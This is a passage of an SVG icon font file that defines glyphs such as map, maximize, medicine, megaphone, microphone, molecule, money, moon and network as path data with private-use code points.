54-7 12-1 21 7 23 17 1 12-5 22-17 24z m9 212c-19-5-37-10-55-15-10-3-15-13-13-24 2-9 10-16 21-18 20 6 41 12 61 19 9 3 12 15 9 24-3 10-12 16-23 14z m-128-32c-20-4-40-9-59-15-10-3-14-14-11-24 2-9 10-15 23-15 18 5 38 10 59 16 8 3 12 14 10 23-3 10-12 17-22 15z m204 66c-4 27-21 44-45 55-4 2-8 2-12 1-8-2-14-8-15-16-2-9 1-17 9-22 12-6 21-14 24-28 2-10 10-14 18-14 15 0 24 11 21 24z m-109 55c2 12-6 22-20 23-15 2-30 3-42 5h-6c-16 0-25-7-26-20 0-13 8-20 23-22 15-1 31-2 46-4 13-2 23 5 25 18z m291-316c-19 1-39 2-59 1-12 0-19-10-18-22 0-11 8-18 20-19 9 0 18 0 27 0v0c4 0 9 0 13 0s9-1 14-1c11 1 20 9 20 20 1 9-7 20-17 21z m-522 139c-13-13-19-29-20-52 1-4 3-11 6-18 4-11 14-15 24-12 11 3 17 13 14 24-4 12-1 22 7 31 8 9 6 21-2 28-8 7-21 7-29-1z m631-139c-11 1-22 1-33 0-11-1-19-11-18-21 0-11 8-20 19-20 5-1 10-1 15-1v1c5 0 10-1 15 0 12 1 20 10 20 20 0 10-8 20-18 21z m-568 305c6 0 12-1 18 0 10 1 17 10 17 20 0 10-8 20-18 20-11 1-22 1-33 0-10 0-18-10-19-20 0-10 8-19 19-20 5-1 11 0 16 0z" />
<glyph glyph-name="map" horiz-adv-x="1000" unicode="&#xef8b;" d="M359 358c-30 0-55-25-55-56 0-30 25-55 55-55 31 0 56 25 56 55 0 31-25 56-56 56z m542-56c0 6 0 16 1 22l34 275c1 6-3 13-8 15l-250 95c-6 2-15 2-20-1l-304-145c-6-3-15-3-21-1l-262 111c-5 2-9-1-8-7l35-295c1-6 1-16 0-22l-34-290c0-6 4-11 10-13l278-52c6-1 16-1 22 0l284 54c6 1 16 1 22 0l248-57c6-2 10 2 10 8l-37 303z m-235 368c0 6 5 10 11 7l219-82c5-2 9-9 8-15l-13-108c-1-6-6-10-12-8l-217 55c-6 1-11 7-10 13l14 138z m-296-132l255 122c6 3 10 0 9-6l-11-114c0-6-5-12-12-12l-143-19c-6-1-11-2-11-3l-1-2c0-1-16-59-34-94-3-5-10-7-15-4-7 3-15 6-23 7-6 2-11 7-12 13l-11 96c-1 6 3 13 9 16z m250-32l-9-133c-1-7-6-12-12-13l-122-18c-6-1-12 3-15 8-7 14-16 27-27 37-5 4-6 11-4 17 14 25 26 62 32 83 2 6 8 11 14 12l133 17c6 1 11-4 10-10z m-379 63l79-33c6-2 11-9 12-15l10-95c1-7-3-12-9-13-35-9-64-33-78-66-2-5-9-9-15-8l-100 15c-6 1-12 7-12 13l-10 91c0 6 4 12 10 12 35 5 62 17 80 39 14 17 20 37 22 54 1 6 6 9 11 6z m-143 51c-1 6 3 9 9 6l103-43c5-3 10-10 9-16-1-15-7-35-20-51-16-19-40-31-72-34-6-1-12 3-13 10l-16 128z m79-563l-71 13c-6 1-10 7-10 13l28 233c1 6 6 10 12 9l99-15c6-1 11-3 11-5 0-1 0-2 0-3 0-22 6-43 18-61 3-5 2-12-2-16l-46-36c-5-4-9-12-10-18l-16-105c-1-6-7-10-13-9z m156-18c-1-6-6-10-12-9l-111 21c-6 1-10 6-9 13l15 101c1 6 6 14 11 18l42 34c5 3 12 3 17-1 14-12 32-21 52-25 6-1 10-7 9-13l-14-139z m-65 263c0 51 41 91 91 91 50 0 91-40 91-91 0-50-41-91-91-91-50 0-91 41-91 91z m175-265l-69-13c-6-1-12-2-12-2-1 0-1 5-1 11l16 147c0 6 6 11 12 13 48 13 84 57 84 109l0 5c0 2 4 5 10 6l119 18c6 1 11-3 12-10l9-97c1-6-4-11-10-12-56-4-98-23-125-56-30-35-35-79-34-106 0-6-5-12-11-13z m184 35l-151-28c-6-2-11 2-11 9 0 25 5 64 32 96 25 30 64 48 117 52 7 0 12-4 13-10l10-106c0-6-4-12-10-13z m12 305l10 122c1 6 6 10 12 9l216-55c6-2 10-8 10-14l-12-91c-1-6-6-10-12-9l-213 26c-6 0-11 6-11 12z m255-349l-119 28c-6 1-11 7-12 13l-16 160c-1 6 4 11 10 10l74-9c6 0 11 2 11 5 0 3-5 6-12 7l-86 10c-6 1-10-4-10-10l18-170c0-6-4-10-10-9l-65 14c-6 2-11 8-12 14l-23 235c0 6 0 11 1 11 0 0 6 0 12-1l205-26c6-1 12-7 12-13l31-260c1-6-3-10-9-9z" />
<glyph glyph-name="maximize" horiz-adv-x="1000" unicode="&#xef8c;" d="M895 788h-597c-5 0-10-1-14-1-17-3-28-15-28-32 0-24 0-48 0-72v-89h-13c-49 0-98 1-146 0-16 0-29-8-32-22-2-6-2-12-2-19 0-197 0-395 0-593 0-5-1-10 0-15 1-18 12-30 30-32 5 0 10 0 14 0h593c3 0 6 0 9 0 23 1 35 13 35 36 0 48 0 96 0 144v13h158c20 0 33 11 35 31 0 4 0 7 0 10v598c1 31-11 43-42 43z m-217-807h-547v546h125v-383c0-27 12-38 38-38h384v-125z m192 192h-547v547h547v-547z m-439 84c15-4 26 3 36 13 80 80 160 160 241 240 2 3 5 6 9 9 1-4 1-5 1-6 0-40 0-79 0-118 0-11 4-20 12-26 11-9 23-11 35-5 14 7 19 19 19 34 0 67 0 133 0 200 0 23-13 36-36 36-16 0-32 0-49 0-50 0-101 0-152 0-21 0-36-14-36-33 0-19 15-33 36-33 29 0 57 0 86 0h37c-5-5-7-8-10-11-80-79-159-159-238-238-3-3-7-6-9-10-15-18-5-46 18-52z" />
<glyph glyph-name="measure" horiz-adv-x="1000" unicode="&#xef8d;" d="M703 706h147c17 0 111 82 63 82h-830c-38 0 42-82 66-82h167c10 0 18-8 18-17v-63c0-10-8-18-18-18h-155c-10 0-18-7-19-17l-29-661c0-10 8-18 17-18h725c10 0 17 8 17 18l-29 661c0 10-9 17-18 17h-122c-10 0-18 8-18 18v63c0 10 8 17 18 17z m41-451c0-129-105-234-234-234s-235 105-235 234 105 235 235 235 234-105 234-235z m-183 24c-1 4-2 7-3 10l-49 133-44-138c-1-3-1-6-2-9l0-1h0c0-3-1-5-1-8 0-32 23-58 50-58 28 0 50 26 50 58 0 4 0 8-1 12l0 1z" />
<glyph glyph-name="medicine" horiz-adv-x="1000" unicode="&#xef8e;" d="M834 500l-63 96c-5 7-8 18-8 25 0 7 2 13 5 13s6 7 6 15v124c0 8-6 15-15 15h-517c-8 0-15-7-15-15v-124c0-8 3-15 6-15 2 0 5-6 5-13 0-7-4-18-8-25l-64-96c-4-7-8-19-8-27v-546c0-8 7-15 15-15h655c8 0 14 7 14 15v546c0 8-3 20-8 27z m-130 254c0 4 3 8 7 8 5 0 8-4 8-8v-96c0-4-3-8-8-8-4 0-7 4-7 8v96z m-85 0c0 4 3 8 7 8 4 0 7-4 7-8v-96c0-4-3-8-7-8-4 0-7 4-7 8v96z m-86 0c0 4 4 8 8 8 4 0 7-4 7-8v-96c0-4-3-8-7-8-4 0-8 4-8 8v96z m-85 0c0 4 3 8 7 8 4 0 8-4 8-8v-96c0-4-4-8-8-8-4 0-7 4-7 8v96z m-85 0c0 4 3 8 7 8 4 0 7-4 7-8v-96c0-4-3-8-7-8-4 0-7 4-7 8v96z m-86 0c0 4 3 8 8 8 4 0 7-4 7-8v-96c0-4-3-8-7-8-4 0-8 4-8 8v96z m491-782h-536c-8 0-15 6-15 15v120c0 23 19 41 42 41h483c22 0 41-18 41-41v-120c0-8-7-15-15-15z m-238 328h46c3 0 5-3 5-6v-38c0-3-2-5-5-5h-46c-3 0-5-3-5-6v-46c0-3-3-5-6-5h-38c-3 0-5 2-5 5v46c0 3-3 6-6 6h-45c-4 0-6 2-6 5v38c0 3 2 6 6 6h45c3 0 6 2 6 5v46c0 3 2 5 5 5h38c3 0 6-2 6-5v-46c0-3 2-5 5-5z m211 92h-482c-23 0-42 14-42 32v31c0 8 4 20 9 27l63 96c5 7 8 19 8 27v14c0 8 7 15 15 15h376c9 0 15-7 15-15v-14c0-8 4-20 9-27l63-96c4-7 8-19 8-27v-31c0 0-19-32-42-32z" />
<glyph glyph-name="mega-phone" horiz-adv-x="1000" unicode="&#xef8f;" d="M377 120l-22 57-29-3-11 28 59 7-31 265-206-24-6-28c-5-18-8-39-9-64-8 0-14-1-20-2-6-1-11-1-13-1-8-1-15-5-20-12-5-6-7-13-6-21l3-30c1-8 5-14 11-19 7-5 14-8 22-7 2 1 7 1 13 2 6 1 13 1 20 2 7-23 15-43 23-60 9-17 13-25 13-25l59 7 86-226 88 10-54 140 30 4z m309 496c-21-21-46-40-76-58-29-19-64-35-103-50-39-15-84-25-135-31 0 0 1-14 5-41 3-28 7-58 11-91 4-33 7-64 11-91 3-28 4-42 4-42 50 6 97 6 138 1 42-5 79-14 112-25s62-24 88-38c25-15 46-29 64-43l-66 565c-14-17-32-36-53-56z m251-210c-2 20-12 36-29 48-18 13-36 18-57 16l-28 239c0 8-3 14-8 19s-13 7-24 6c-3-1-6-3-11-9-5-5-11-12-17-21l72-623c8-7 16-13 22-17 6-4 10-6 13-6 10 1 17 5 21 11s5 14 5 22l-28 232c21 3 38 13 52 29 14 16 19 34 17 54z" />
<glyph glyph-name="megaphone-alt" horiz-adv-x="1000" unicode="&#xef90;" d="M580 330c-25 62-51 125-77 187-3 7-7 14-15 16-14 6-24 1-34-8-106-93-213-187-320-280-3-3-7-5-11-7-30-16-64-21-97-28-23-5-31-19-22-41 13-33 27-66 40-99 11-24 26-29 48-14 25 17 50 35 80 45 7 2 10 2 13-5 13-35 28-68 42-102 6-16 18-24 30-22 7 1 13 4 19 7 19 8 25 22 16 42-11 27-22 54-34 81-3 7-3 9 6 10 116 7 233 15 350 23 30 2 40 17 29 45-21 50-42 100-63 150z m-460-203c-13-10-26-21-41-32-10 25-19 49-29 72-2 5 0 6 4 7 14 1 29 3 43 5 4 1 6-1 8-5 5-13 10-26 16-39 1-3 3-5-1-8z m601 461c-14 13-29 24-46 34-11 4-21 1-30-6-10-9-10-18 2-25 65-44 113-100 138-175 19-58 19-117 7-176-2-14 4-21 18-19 16 3 24 11 28 32 23 134-14 246-117 335z m124 96c-18 16-37 30-57 42-15 6-27 2-38-8-13-11-12-21 2-31 82-54 143-125 173-220 24-72 25-146 10-220-4-19 4-27 22-24 20 3 30 13 35 40 29 168-17 309-147 421z m-221-173c-12 6-28 0-35-9-7-11 0-17 8-24 58-53 84-120 80-199-1-13 6-19 20-17 15 2 23 11 24 26 4 80-21 148-77 206-7 7-14 13-20 17z" />
<glyph glyph-name="megaphone" horiz-adv-x="1000" unicode="&#xef91;" d="M789 772c-5 2-28 10-51 1-89-40-176-84-265-125-33-15-66-32-99-47-38-16-78-22-119-22-30-1-60-1-89 0-56 1-98-24-130-67-11-16-20-34-26-52-10-31-18-84 4-149 12-31 31-58 58-79 3-2 5-4 5-8 3-33 11-65 17-97 9-55 20-108 30-163 4-21 16-34 37-40 1 0 2-1 2-1h14c19 5 40 7 59 11 19 4 37 7 56 11 28 5 43 29 38 58-7 37-21 70-42 101-19 27-31 56-38 88-2 8 0 10 8 10 51-2 99-14 145-36 109-53 220-105 330-157 36-17 75-1 87 37 33 101 54 205 57 311 5 131-17 258-59 382-5 16-15 26-29 33z m-434-504c-13 3-27 6-41 8 28 88 13 181 1 229 14 2 27 5 41 8 33-131 14-209-1-245z m443 82c-4-86-20-170-44-252-3-9-5-10-13-6-109 52-219 104-328 156 40 109 14 230-1 284 24 10 47 22 70 33 86 41 173 82 259 123 5 3 10 6 12-3 33-110 51-221 45-335z m200 66c-8 43-30 76-65 100-5 3-10 8-18 9 12-90 12-180 0-269 3-1 5 1 6 2 32 18 55 44 69 78 5 11 6 23 10 34v41c-2 2-2 4-2 5z" />
<glyph glyph-name="memorial" horiz-adv-x="1000" unicode="&#xef92;" d="M837-13l-129 801-40-270-66 240-14-270-74 140-12-217-71 95-10-195-81 53-6-166-75 38-15-166-75 22-21-105h-44v-75h792v75h-59z m-143 599l73-599h-19l-61 502 7 97z m-80-5l113-594h-3l-117 442 7 152z m-75-70l144-524h-1l-159 389 16 135z m-92-66l192-458h-3l-197 294 8 164z m-91-107l225-351h-6l-224 200 5 151z m-83-124l239-227h-19l-234 80 14 147z m-89-144l251-82h-257l6 82z" />
<glyph glyph-name="memory-card" horiz-adv-x="1000" unicode="&#xef93;" d="M761 788h-361c-19 0-37-8-51-22l-162-162c-13-13-21-31-21-50v-570c0-39 32-72 72-72h523c40 0 72 33 72 72v732c0 39-32 72-72 72z m-287-218c0-10-8-18-18-18h-73c-9 0-17 8-17 18v130c0 10 8 18 17 18h73c10 0 18-8 18-18v-130z m146 0c0-10-8-18-18-18h-73c-10 0-18 8-18 18v130c0 10 8 18 18 18h73c10 0 18-8 18-18v-130z m146 0c0-10-8-18-18-18h-73c-10 0-18 8-18 18v130c0 10 8 18 18 18h73c10 0 18-8 18-18v-130z" />
<glyph glyph-name="mic-mute" horiz-adv-x="1000" unicode="&#xef94;" d="M346 318c0-11 1-20 4-30 2-5 6-6 9-1l261 395c3 5 5 13 2 19-25 58-88 94-151 85-68-9-124-69-126-138-1-55 0-110 0-165 0-55-2-110 1-165z m185-131c64 20 105 78 105 151 0 44 0 87 0 130 0 6-2 7-5 2l-180-272c-3-5-2-11 4-12 24-6 50-6 76 1z m-246-11l43 65c3 4 4 12 1 17-9 22-14 45-14 70 0 48 0 95 0 143v6c0 4-5 7-11 7h-69c-5 0-10-5-10-10 0-54-2-107 1-160 2-52 18-98 48-138 3-5 8-5 11 0z m471 304c0 1 0 2 0 2-1 1-6 2-11 2h-69c-6 0-10-3-10-6v-7c0-46 0-91 0-137-1-11-1-23-3-34-11-80-85-146-165-148-21-1-41 2-60 8-5 2-12 0-15-5l-39-59c-3-5-2-11 4-13 15-6 31-12 49-16 3 0 8-4 8-6 1-16 1-32 1-49 0-6-5-10-11-10h-79c-6 0-11-5-11-10v-69c0-6 5-10 11-10h269c6 0 11 4 11 10v69c0 6-5 10-11 10h-80c-5 0-10 5-10 11 0 15 0 30 0 45 0 7 3 8 9 10 117 26 202 121 210 240 4 57 2 115 2 172z m15 278l-35 24c-5 3-11 2-14-3l-492-744c-3-4-2-11 3-14l35-23c5-4 11-2 15 3l491 742c3 5 2 11-3 15z" />
<glyph glyph-name="mic" horiz-adv-x="1000" unicode="&#xef95;" d="M356 318c3-92 97-157 185-131 65 20 105 78 105 151 1 98 1 195 0 292 0 19-3 38-8 55-20 67-88 111-157 101-68-9-124-69-126-138-1-55 0-110 0-165 0-55-2-110 1-165z m410 164c-1 2-6 2-11 2h-69c-6 0-10-3-10-6v-7c0-46 0-91 0-137 0-11-1-23-3-35-11-79-85-145-166-148-99-3-182 77-182 177 0 48 0 95 0 143v6c0 4-5 7-11 7h-69c-5 0-10-5-10-10 0-54-2-107 1-160 2-64 27-119 70-166 38-42 85-68 140-81 4 0 9-4 9-6 1-16 0-32 0-49 0-6-4-10-10-10h-80c-5 0-10-5-10-11v-68c0-6 5-10 10-10h270c6 0 10 4 10 10v69c0 6-4 10-10 10h-80c-5 0-10 5-10 11 0 15 0 30 0 45 0 7 3 8 9 10 117 25 201 120 210 240 4 57 2 115 2 172 0 1 0 2 0 2z" />
<glyph glyph-name="military" horiz-adv-x="1000" unicode="&#xef96;" d="M729 589c25 17 50 33 75 50 4 2 7 4 11 7-2 1-2 2-3 2-2 0-5 0-7-1-39-7-71 2-95 35-22 33-51 58-86 77-69 37-140 35-212 9-48-18-93-43-125-85-57-74-61-154-23-236 16-35 40-66 62-97 11-17 18-32 9-52 0 0 1-1 2-3 15 5 31 10 47 16-1-19-7-36-18-55-20-35-48-62-76-91-45-46-80-97-97-160-9-31-9-62-8-93h512c-1 38-10 72-31 102-21 29-40 59-62 87-26 34-34 71-27 111 3 15 7 28 20 40 13-60 43-110 79-158 5 4 10 8 14 12 2 0 2 2 4 3-35 47-65 96-76 156 4 1 8 3 12 3 22-1 43-2 65-1 11 0 23 2 32 7 16 9 15 24 10 39-3 12-3 23 6 32 11 10 11 11 1 21 13 13 13 13 5 31 0 1-1 2-1 3-5 8-2 12 5 14 7 3 14 5 21 8 11 5 12 8 5 18-13 21-27 41-41 62-9 13-12 26-4 41 2 4 1 10 0 14-2 5-5 11-8 15-4 8-3 12 3 17z" />
<glyph glyph-name="mill" horiz-adv-x="1000" unicode="&#xef97;" d="M627 256l-127 157-127-157-76-314c-2-7 0-15 4-20 4-6 11-10 18-10h126v91c0 30 24 54 55 54 30 0 54-24 54-54v-91h127c7 0 14 4 18 10 4 5 6 13 4 20l-76 314z m-278 83l131 164c-16 6-28 18-34 33l-163-131c-18-18-18-48 0-66 9-9 21-13 33-13 11 0 23 4 33 13z m205 197c-6-15-18-27-34-33l131-164c10-9 21-13 33-13 12 0 24 4 33 13 18 18 18 48 0 66l-163 131z m-108 41c6 15 18 27 34 33l-131 164c-10 9-22 14-33 14-12 0-24-5-33-14-18-18-18-48 0-66l163-131z m108 0l163 131c19 18 19 48 0 66-9 9-21 14-32 14-12 0-24-5-33-14l-132-164c16-6 28-18 34-33z m-93-20c0-22 18-39 39-39 21 0 39 17 39 39 0 21-17 38-39 38-21 0-39-17-39-38z" />
<glyph glyph-name="minus-circle" horiz-adv-x="1000" unicode="&#xef98;" d="M500 788c-242 0-437-196-437-438 0-242 195-438 437-438 242 0 438 196 438 438 0 242-196 438-438 438z m302-467c-1-9-2-19-5-30h-594c-2 11-4 21-5 31-1 10-1 20-1 30 0 9 0 18 1 27 1 9 3 19 5 30h594c3-11 4-21 5-31 1-10 1-20 1-30 0-9 0-18-1-27z" />
<glyph glyph-name="minus-square" horiz-adv-x="1000" unicode="&#xef99;" d="M865 788h-730c-40 0-72-33-72-73v-730c0-40 32-73 72-73h730c40 0 73 33 73 73v730c0 40-33 73-73 73z m-63-467c-1-9-2-19-5-30h-594c-2 11-4 21-5 31-1 10-1 20-1 30 0 9 0 18 1 27 1 9 3 19 5 30h594c3-11 4-21 5-31 1-10 1-20 1-30 0-9 0-18-1-27z" />
<glyph glyph-name="minus" horiz-adv-x="1000" unicode="&#xef9a;" d="M794 409c2-11 4-22 5-31 1-10 1-20 1-30 0-9 0-18-1-27-1-9-3-19-5-30h-588c-2 11-4 22-5 31-1 10-1 20-1 30 0 9 0 18 1 27 1 9 3 19 5 30h588z" />
<glyph glyph-name="mobile-phone" horiz-adv-x="1000" unicode="&#xef9b;" d="M664 685c-17 0-30 14-30 31v40c0 18-13 32-30 32h-20c-16 0-29-14-29-32v-40c0-17-14-31-30-31h-188c-16 0-29-14-29-32v-709c0-18 13-32 29-32h327c16 0 29 14 29 32v709c0 18-13 32-29 32z m-262-684c-16 0-30 15-30 32s14 31 30 31c16 0 30-14 30-31s-14-32-30-32z m0 105c-16 0-30 14-30 31s14 32 30 32c16 0 30-15 30-32s-14-31-30-31z m0 104c-16 0-30 14-30 31s14 32 30 32c16 0 30-14 30-32s-14-31-30-31z m97-209c-17 0-30 15-30 32s13 31 30 31c16 0 29-14 29-31s-13-32-29-32z m0 105c-17 0-30 14-30 31s13 32 30 32c16 0 29-15 29-32 0-17-13-31-29-31z m0 104c-17 0-30 14-30 31s13 32 30 32c16 0 29-14 29-32 0-17-13-31-29-31z m96-209c-16 0-30 15-30 32s14 31 30 31c16 0 30-14 30-31s-14-32-30-32z m0 105c-16 0-30 14-30 31s14 32 30 32c16 0 30-15 30-32s-14-31-30-31z m0 104c-16 0-30 14-30 31s14 32 30 32c16 0 30-14 30-32s-14-31-30-31z m48 196c0-17-13-32-29-32h-227c-16 0-29 15-29 32v173c0 18 13 32 29 32h227c16 0 29-14 29-32v-173z" />
<glyph glyph-name="molecule" horiz-adv-x="1000" unicode="&#xef9c;" d="M702 270l-93 61c12 34 9 72-8 105l76 68c43-26 99-21 135 16 43 42 43 112 0 154s-111 43-154 0c-34-33-41-83-22-124l-76-69c-37 26-84 30-124 14l-89 122c32 41 29 101-9 139-42 42-109 42-151 0s-42-109 0-150c30-30 73-39 110-26l89-122c-44-51-41-128 7-177 1-1 2-1 3-2l-86-151c-36 9-75-1-102-29-43-43-43-112 0-155s111-42 154 0c42 43 43 111 1 154l86 151c43-13 92-3 126 30l94-61c-6-27 2-57 23-79 34-34 89-34 123 0 34 34 34 89 0 122-31 31-79 34-113 9z m-458-224c-2-2-4-4-5-6-3-3-6-6-10-7-5-2-10 0-14 4-11 10-7 30 9 46 16 15 35 20 46 9 4-4 5-9 4-14-2-4-5-8-7-10-2-2-4-4-7-6-2-2-5-5-8-7-3-3-5-6-8-9z m430 612c16 16 36 20 46 9 4-4 5-9 4-14-1-4-4-7-7-10-2-1-4-3-6-5-3-3-6-5-9-8-2-3-5-6-7-8-2-3-4-5-6-7-3-2-6-5-10-6-5-2-10-1-14 3-11 11-7 30 9 46z m-451 47c-2-3-4-5-6-7-2-2-5-5-9-6-5-1-10 0-14 4-10 10-6 29 9 44s35 20 45 9c3-3 5-8 3-13-1-4-4-8-6-10-2-2-4-4-6-6-3-2-6-4-8-7-3-3-6-6-8-8z m190-258c18 19 42 23 54 11 5-5 7-11 5-17-2-5-5-9-8-12-2-2-5-4-8-7-3-3-6-6-10-9-3-3-6-7-9-10-2-3-5-5-7-8-3-3-7-6-12-8-6-1-12 0-17 5-12 12-7 36 12 55z m304-233c-2-2-5-4-8-5-4-1-8 0-11 3-9 8-5 24 7 36 13 13 28 16 36 8 4-3 5-8 3-12-1-3-3-6-5-7-1-2-3-4-5-5-2-2-4-4-7-6s-4-5-6-7c-1-2-3-3-4-5z" />
<glyph glyph-name="money" horiz-adv-x="1000" unicode="&#xef9d;" d="M822 696l-115-107h-414l-115 107s57 80 151 90c93 10 125-46 171-48 46 2 78 58 170 48 95-10 152-90 152-90z m-306-514v-80c12 2 22 6 30 14 7 8 11 17 11 27 0 9-3 17-10 24-6 6-17 12-31 15z m-68 104c0-8 3-15 8-21 6-6 13-11 24-15v72c-9-3-17-8-23-14-6-7-9-14-9-22z m444-278s-26-96-140-96h-504c-115 0-140 96-140 96-75 332 154 512 154 512h476s229-180 154-512z m-275 142c0 23-7 41-21 55-14 14-41 26-80 35v81c16-6 25-17 29-33l62 7c-4 20-14 37-29 49-15 13-36 20-62 23v20h-36v-20c-28-3-50-12-67-27-17-15-26-34-26-57 0-22 8-41 23-57 15-16 38-27 70-35v-87c-8 4-17 10-24 18-7 8-12 17-14 28l-64-5c4-28 16-49 33-64 18-14 41-23 69-26v-38h36v39c32 4 57 14 74 31 18 18 27 39 27 63z" />
<glyph glyph-name="moon" horiz-adv-x="1000" unicode="&#xef9e;" d="M334 593c0 62 14 120 40 173 8 17 1 26-17 19-172-64-294-227-294-421 0-249 202-451 451-451 194 0 358 122 421 294 7 18-2 25-19 16-53-25-111-39-173-39-226 0-409 183-409 409z" />
<glyph glyph-name="mop" horiz-adv-x="1000" unicode="&#xef9f;" d="M761 784l-7 3c-1 0-2 1-3 1-5 0-9-3-11-8l-184-506c-3 1-5 1-8 1-2 0-5 0-7 1-40 1-82-14-113-48l226-44c0 3 0 6-1 9-4 31-26 55-55 69-2 1-5 2-7 3-2 1-4 2-7 3l184 503c2 5-1 11-7 13z m-240-604l-112 22c-41-66-55-147-92-188-14-15-41-53-85-61l238-29 65 97-29-101 62-8s74 146 85 242l-132 26z" />
<glyph glyph-name="muffin" horiz-adv-x="1000" unicode="&#xefa0;" d="M832 439c-49 89-132 157-233 184 9 16 13 33 13 52 0 62-50 113-113 113-61 0-112-51-112-113 0-19 5-37 13-53-100-27-183-94-232-183-48-13-84-58-84-110 0-36 17-69 43-90 11-8 23-15 36-19h20l55-277c4-18 19-31 38-31h31v187h35v-187h140v187h36v-187h140v187h35v-187h50c18 0 34 13 37 31l55 277h2c13 4 26 11 36 19 26 21 43 54 43 90 1 52-35 97-84 110z m-333 272c21 0 37-16 37-36s-16-36-37-36c-20 0-36 16-36 36s17 36 36 36z m301-414c0-1 0-1 0-1h-599l0 1c-19 2-33 18-33 37 0 21 17 38 38 38 5 0 10-1 14-3 9 22 19 42 32 60 55 79 146 131 248 131s194-52 248-131c13-18 24-38 32-60 5 2 9 3 14 3 21 0 38-17 38-38 0-19-14-35-32-37z" />
<glyph glyph-name="mustache" horiz-adv-x="1000" unicode="&#xefa1;" d="M938 370c-1 7-5 13-11 16-6 3-13 2-19-2-51-37-105-23-133 9-32 36-74 114-174 108-59-3-87-29-101-60-14 31-42 57-101 60-100 6-141-72-174-108-28-32-82-46-133-9-6 4-13 5-19 2-6-3-10-9-10-16-1-35 9-89 66-125 93-57 234-71 325 9 0 0 28 29 46 65 18-36 46-65 46-65 91-80 232-66 325-9 57 36 67 90 67 125z" />
<glyph glyph-name="navigation-menu" horiz-adv-x="1000" unicode="&#xefa2;" d="M63 628v-24c0-38 30-69 68-69h738c38 0 68 31 68 69v24c0 38-30 69-68 69h-738c-38 0-68-31-68-69z m68-359h738c38 0 68 31 68 69v24c0 38-30 69-68 69h-738c-38 0-68-31-68-69v-24c0-38 30-69 68-69z m0-266h738c38 0 68 30 68 68v25c0 38-30 68-68 68h-738c-38 0-68-30-68-68v-25c0-38 30-68 68-68z" />
<glyph glyph-name="navigation" horiz-adv-x="1000" unicode="&#xefa3;" d="M746 402c-7 9-17 14-28 14h-139v79h140c10 0 20 4 26 12l55 64c11 13 12 33 1 47l-55 75c-6 9-17 15-27 15h-140c-1 44-36 80-79 80-44 0-79-38-79-84v-73h-140c-10 0-21-6-27-14l-55-76c-11-14-10-34 1-47l55-64c6-8 16-12 26-12h140v-475c0-17 13-31 29-31h100c16 0 29 14 29 31v260h140c10 0 19 5 26 12l54 64c12 13 13 33 2 47l-55 76z m-167 257h134l47-63-45-53h-136v116z m-294-193l-45 53 47 64h134v-117h-136z m429-215h-135v117h134l47-64-46-53z" />
<glyph glyph-name="network-tower" horiz-adv-x="1000" unicode="&#xefa4;" d="M764 788l-38-38c78-70 119-158 119-262 0-105-42-192-118-261l37-38c177 158 182 435 0 599z m-608-299c0 105 42 191 118 261l-37 37c-184-166-175-443-1-597 12 13 25 25 37 38-76 69-118 156-117 261z m583 0c0-76-32-138-88-187l38-37c142 122 134 335 0 446-12-12-24-24-37-36 55-50 87-111 87-186z m-427-224c12 12 24 24 37 37-55 49-87 111-87 187s32 137 87 186c-12 13-24 25-37 38-143-126-133-335 0-448z m76 74l36 38c-33 29-56 64-56 111 0 47 23 83 58 113-7 7-13 13-20 19-6 6-12 12-18 19-98-81-98-220 0-300z m245 150c0-48-23-83-56-112 13-13 24-25 36-38 100 82 95 222 1 298l-38-37c34-29 57-64 57-111z m118-572c-142 130-207 296-227 483 39 10 68 46 68 88 0 51-41 92-92 92s-91-41-91-92c0-42 28-77 67-88-5-36-9-71-17-106-31-147-97-275-210-378-1-1-2-2-3-4h510c-2 3-3 4-5 5z" />
<glyph glyph-name="network" horiz-adv-x="1000" unicode="&#xefa5;" d="M804 428c0 6-5 11-11 11h-137c-6 0-11-5-11-11 0-6-6-11-12-11h-266c-7 0-12 5-12 11 0 6-5 11-11 11h-137c-6 0-11-5-11-11 0-6-6-11-12-11h-98c-7 0-12-5-12-11v-3c0-7 5-12 12-12h98c6 0 11-4 11-10s6-10 12-10h44c7 0 12-5 12-11v-87c0-6 5-12 11-12 7 0 12 6 12 12v87c0 6 5 11 11 11h46c7 0 12 5 12 10s5 10 11 10h267c7 0 12-4 12-10s5-10 11-10h46c7 0 12-5 12-11v-87c0-6 5-12 11-12s12 6 12 12v87c0 6 5 11 11 11h44c7 0 12 5 12 10s5 10 12 10h98c6 0 12 5 12 12v3c0 6-6 11-12 11h-98c-7 0-12 5-12 11z m-368 63h-31c-7 0-12-4-12-9s5-9 12-9h190c7 0 12 4 12 9s-6 9-12 9h-32c-7 0-12 6-12 12v28c0 6 5 11 12 11h111c7 0 12 6 12 12v222c0 6-6 11-12 11h-348c-7 0-12-5-12-11v-222c0-6 5-11 12-11h110c6 0 11-6 11-12v-28c0-6-5-12-11-12z m-84 101v146c0 7 5 12 12 12h272c7 0 12-6 12-12v-146c0-7-5-12-12-12h-272c-7 0-12 5-12 12z m197-610h110c7 0 12-6 12-12v-28c0-6-5-11-12-11h-31c-6 0-11-4-11-9s5-9 11-9h191c6 0 11 4 11 9s-5 9-11 9h-33c-6 0-11 5-11 11v28c0 6 5 12 11 12h112c6 0 11 5 11 11v222c0 7-5 12-11 12h-349c-6 0-11-5-11-12v-222c0-6 5-11 11-11z m38 207h273c6 0 11-5 11-12v-146c0-6-5-11-11-11h-273c-6 0-11 5-11 11v146c0 7 5 12 11 12z m-485-207h112c6 0 11-6 11-12v-28c0-6-5-11-11-11h-33c-6 0-12-4-12-9s6-9 12-9h191c6 0 11 4 11 9s-5 9-11 9h-31c-7 0-12 5-12 11v28c0 6 5 12 12 12h110c6 0 11 5 11 11v222c0 7-5 12-11 12h-349c-6 0-12-5-12-12v-222c0-6 6-11 12-11z m38 207h273c6 0 11-5 11-12v-146c0-6-5-11-11-11h-273c-7 0-12 5-12 11v146c0 7 5 12 12 12z" />
